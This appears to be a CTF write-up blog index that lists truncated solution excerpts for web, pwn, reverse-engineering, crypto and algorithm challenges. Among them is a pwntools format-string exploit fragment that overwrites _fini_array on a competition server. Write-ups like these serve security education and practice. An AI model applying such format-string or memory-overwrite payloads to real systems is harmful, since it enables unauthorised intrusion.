Home

This is a CTF Security challenge which involves exploiting a Solana on-chain program. NOTE: This challenge is now part of the picoGym practice challenges Points: 500 Category: Binary exploitation (pwn) Challenge Author: Robert Chen (NotDeGhost) Description What is debt? A perversion of a promise? Surely one has to pay one’s debts. TL;...

web/cool (125 solves / 122 points) Description: Aaron has a message for the cool kids. For support, DM BrownieInMotion. cool.mc.ax Downloads: app.py Solution: Source code: from flask import ( Flask, request, render_template_string, session, redirect, send_file ) from random import SystemRandom impo...

bread-making (317 solves/108 points) Description: My parents aren’t home! Quick, help me make some bread please… nc mc.ax 31796 bread Solution: Let’s open this up in ghidra to see what it does. First things first, find the main func and read through all the strings. The main func is typically the first parameter in entry which is always labele...

misc (algo)/the-substitution-game (67 solves / 145 points) Description: nc mc.ax 31996 chall.py Solution: When we run this we get using python3: Welcome to The Substitution Game! In each level, you will enter a list of string substitutions. For example, you may want to change every instance of 'abcd' to 'def'. The game will provide a series o...

baby (827 solves/102 points) Description: I want to do an RSA! output.txt Solution: Right off the bat: RSA encryption time. Let’s open up the file and see what we have n: 228430203128652625114739053365339856393 e: 65537 c: 126721104148692049427127809839057445790 Wow, small N. Let’s use an integar factorization calculator Factoring n gives us p...

web/LIT BUGS (92 solves / 129 points) Description Last year�s LIT platform may or may not have had some security vulnerabilities. We have created a simplified version of last year�s platform called LIT BUGS (Lexington Informatics Tournament�s Big Unsafe Grading System). The flag is the team name of the only registered user. Visit LIT BUGS here D...

pwn/Lazy Annotated script:## from pwn import * elf = ELF("lazy") libc = ELF("libc-2.31.so") #conn = elf.process() conn = remote("lazy.litctf.live", 1337) # overwrite _fini_array with main() fini = 0x0000000004031c8 # overwrite char by char because we dont wanna get huge chunks of text from server payload = b"%17c%12$hhn%47c%11$hhn%18c%13$hhnb...

rev/Evaluation (201 solves/112 points) Description: Here’s an evaluation copy of my flag checker! I hid the flag in the evaluation copy though… print(eval(eval(eval(eval(eval(eval("''.join([chr(i) for i in [39,39,46,106,111,105,110,40,91,99,104,114,40,105,41,32,102,111,114,32,105,32,105,110,32,91,51,57,44,51,57,44,52,54,44,49,48,54,44,49,49,49,4...